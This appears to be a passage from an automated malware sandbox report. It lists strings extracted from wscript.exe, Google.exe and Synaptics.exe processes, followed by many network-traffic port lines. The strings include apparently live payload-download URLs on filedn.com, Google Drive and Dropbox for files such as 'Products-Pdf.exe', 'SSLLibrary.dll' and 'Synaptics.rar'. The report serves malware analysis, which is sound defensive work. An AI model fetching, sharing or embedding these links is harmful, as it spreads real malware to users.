                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006FA4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3015474774.000000000E5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadve
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvi&
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvn
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvt
                            Source: Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.0000000000918000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw.
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwOY#
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwP
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.00000000008DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwZ
                            Source: Synaptics.exe, 0000001D.00000002.2989870916.0000000007072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw_
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwow6
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwy
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000054CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3052445187.000000001D752000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3008225961.000000000E30B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3057921806.000000001D895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                            Source: Synaptics.exe, 00000005.00000002.2048249910.000000000547D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx_c
                            Source: Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxl
                            Source: Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxn
                            Source: Synaptics.exe, 0000001D.00000002.3006968919.000000000E2B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxrJ
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000006FA4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2989870916.0000000007102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3015474774.000000000E5B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyD
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyndicFl
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004E05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyo
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.000000000089F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3014021698.000000000E526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadza
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzy-
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2993567554.0000000007192000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E67A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3012002014.000000000E4A3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E64D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~#~
                            Source: Synaptics.exe, 0000001D.00000002.3052445187.000000001D732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~&
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.00000000071D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~gX
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~t
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~w
                            Source: Google.exe, 00000001.00000003.1743429618.0000000002290000.00000004.00001000.00020000.00000000.sdmp, Google.exe, 0000001A.00000003.2270153764.00000000023A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                            Source: Google.exe, 00000001.00000003.1743429618.0000000002290000.00000004.00001000.00020000.00000000.sdmp, Google.exe, 0000001A.00000003.2270153764.00000000023A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                            Source: Google.exe, 00000001.00000000.1725463339.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, Synaptics.exe, 00000005.00000002.2040812278.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                            Source: Synaptics.exe, 00000005.00000002.2040812278.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                            Source: Synaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.iU
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com//
                            Source: Synaptics.exe, 0000001D.00000002.2989870916.000000000713E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3006968919.000000000E2BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3016544660.000000000E69E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL4mj
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL4mjb
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPT
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPragma:
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000074E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3057921806.000000001D88F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc#
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc2
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcI
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc~
                            Source: Synaptics.exe, 0000001D.00000002.2953691114.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                            Source: Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                            Source: Synaptics.exe, 00000005.00000002.2039578728.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~1o
                            Source: Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/v
                            Source: wscript.exe, 00000000.00000002.1728737665.00000231A042A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1727135319.00000231A0429000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filedn.com/)
                            Source: wscript.exe, 00000000.00000002.1728737665.00000231A042A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1727135319.00000231A0429000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filedn.com/k
                            Source: wscript.exe, 00000000.00000002.1728376593.000002319DF9D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1725962280.000002319DD33000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1727652733.000002319DC96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1726162762.000002319DC96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Products-Pdf.exe
                            Source: wscript.exe, 00000000.00000003.1727027971.00000231A048F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1728937926.00000231A048F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Products-Pdf.exeY
                            Source: wscript.exe, 00000000.00000003.1725904864.000002319DD13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1727945745.000002319DD38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1725962280.000002319DD33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Products-Pdf.exedll
                            Source: wscript.exe, 00000000.00000003.1726636255.000002319FC25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Products-Pdf.exet
                            Source: wscript.exe, 00000000.00000003.1725904864.000002319DD13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1727945745.000002319DD38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1725962280.000002319DD33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Products-Pdf.exeu
                            Source: wscript.exe, 00000000.00000002.1728737665.00000231A042A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1727135319.00000231A0429000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                            Source: Google.exe, 0000001A.00000003.2270153764.00000000023A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
                            Source: Google.exe, 00000001.00000000.1725463339.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, Synaptics.exe, 00000005.00000002.2040812278.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                            Source: Synaptics.exe, 00000005.00000002.2040812278.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                            Source: Google.exe, 00000001.00000003.1743429618.0000000002290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=T
                            Source: Google.exe, 00000001.00000003.1743429618.0000000002290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl
                            Source: Google.exe, 00000001.00000000.1725463339.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, Synaptics.exe, 00000005.00000002.2040812278.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                            Source: Synaptics.exe, 00000005.00000002.2040812278.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                            Source: Google.exe, 0000001A.00000003.2270153764.00000000023A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlx
                            Source: Google.exe, 0000001A.00000003.2270153764.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                            Source: Synaptics.exe, 00000005.00000002.2040812278.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51944
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51945
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51942
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51943
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52232 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52255 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52358 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52037 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52312 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52220 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52335 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51955
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52186 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51953
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51954
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52002 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52048 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52323 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52369 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51951
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52221 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52116 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52347 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51962
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51963
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52197 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51977
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51978
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51975
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51976
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52300 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52163 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52025 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52381 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52254 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52279 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52311 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51962 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52095 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52336 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52265 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52104 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52368 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52082 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52380 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52345 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52207 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52130 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52302 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52291 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52379 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51919
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51985 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52334 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51918
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52242 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52313 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52187 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52219 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52301 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52164 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52324 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52264 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51928
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51986 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51929
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51963 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51931
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51932
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52142 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51997 -> 443
